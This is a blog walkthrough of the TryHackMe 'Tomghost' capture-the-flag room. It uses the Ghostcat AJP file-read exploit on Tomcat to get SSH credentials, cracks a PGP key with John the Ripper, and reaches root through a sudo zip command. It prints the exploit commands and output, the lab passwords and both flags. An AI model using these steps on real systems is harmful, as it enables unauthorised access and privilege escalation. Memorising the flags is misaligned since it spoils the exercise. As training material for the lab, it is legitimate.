Tomghost “Try Hack Me” Walkthrough (Hacked)

5/5 - (4 votes)

In this CTF (Capture the Flag) challenge walkthrough, we will be hacking into an Apache Tomcat server using an exploit created by a Chinese developer.

This exploit is available as a standalone Python file and as a Metasploit module.

Tomghost "Try Hack Me" Walkthrough (Hacked)

In the walkthrough video, I’ll demonstrate both methods of gaining an initial foothold into the box. We will use a trusty hash cracking tool, John the ripper to decrypt a password from two files found on the target machine.

Logging in as the second user, we can leverage our permissions to run the zip bin as root in order to retrieve the root flag.

Please note that this box contains a username with foul language. If you are easily offended by bad words, please don’t continue reading this walkthrough. 

ENUMERATION

First, let’s export our IPs and enumerate with nmap.

export myIP=10.6.2.23
export targetIP=10.10.225.99

sudo nmap -Pn -sC -p- -O $targetIP

Next we will look further into the port 8009 service ajp13 with some searching on Google. We quickly discover that it looks like a tomcat apache server that has a vulnerability that can be exploited with Ghostcat.Β 

INITIAL FOOTHOLD WITH GHOSTCAT

Using metasploit with the ghostcat module, we can retrieve the first user’s username and password. Also of interest is port 8080 running an HTTP-proxy. This is probably a webpage we can look at in a browser.Β 

The other method for retrieving the first username and password is to run the following command to use ajpShooter.py directly without metasploit:

python ajpShooter.py http://10.10.176.124:8080 8009 /WEB-INF/web.xml read
---
   	_	_     	__ _             	_       	 
  	/_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __
 	//_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
	/  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
	\_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
     	|__/|_|                                   	 
                                            	00theway,just for test
    

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261

<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

  	http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                  	http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
 	Welcome to GhostCat
    skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
****
**---**

SSH INTO THE TARGET MACHINE

Now that we have retrieved the user:password, we can go ahead an SSH into the box.

ssh skyfuck@10.10.176.124
Password: 8730281lkjlkjdqlksalks

During further enumeration, we discovered two files: tryhackme.asc, and credential.pgp. These files will probably help us uncover another hidden string. The .pgp file contains a hash that, when cracked, reveals a key to decrypt the .asc file.

First, we need to transfer both files to our attacker machine so that we can use john the ripper to decrypt the hash. We can use SCP (secure copy protocol to transfer the files).

The following commands allow us to uncover the hidden string, which turns out to be another username:password combination.

sudo scp skyfuck@10.10.91.141:/home/skyfuck/credential.pgp ~/THM/tomghost/credential.pgp

sudo scp skyfuck@10.10.91.141:/home/skyfuck/tryhackme.asc ./tomghost/tryhackme.asc

DECRYPTING THE HIDDEN SECRET WITH JOHN THE RIPPER

On our attacker machine we can run john2hash to nicely convert the .asc file into a new file packed up for john the ripper, titled β€œhash”.

john2hash tryhackme.asc > hash

And finally, we can run john the ripper now to decrypt the credential.pgp file.

John --wordlist=/home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou/rockyou.txt hash

The rockyou.txt file is a leaked database of passwords that is often used in pentesting. Once we crack the hash, we will use the following commands to decrypt the credential.pgp file.

gpg --import tryhackme.asc
sudo gpg --decrypt credential.pgp

And we have it!

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j%

!!!
THM{GhostCat_1s_so_cr4sy}
!!!

EXPLOITING SUDO PERMISSIONS ON ZIP

First, we need to switch over the user Merlin with:

su merlin

We discover with a sudo -l search that we have sudo permissions to run the zip bin.

Over on GTFObins we find a privilege escalation vector using zip to maintain SUDO permissions and retrieve the root flag:

merlin@ubuntu:/usr/bin$ TF=$(mktemp -u)
merlin@ubuntu:/usr/bin$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
root
# cd /root
# ls
root.txt  ufw
# cat root.txt
THM{Z1P_1S_FAKE}

Thanks for reading/watching my walkthrough. Also make sure to check out my other TryHackMe tutorials:

πŸ‘‰ Recommended: TryHackMe – Capture the Flag Mr. Robot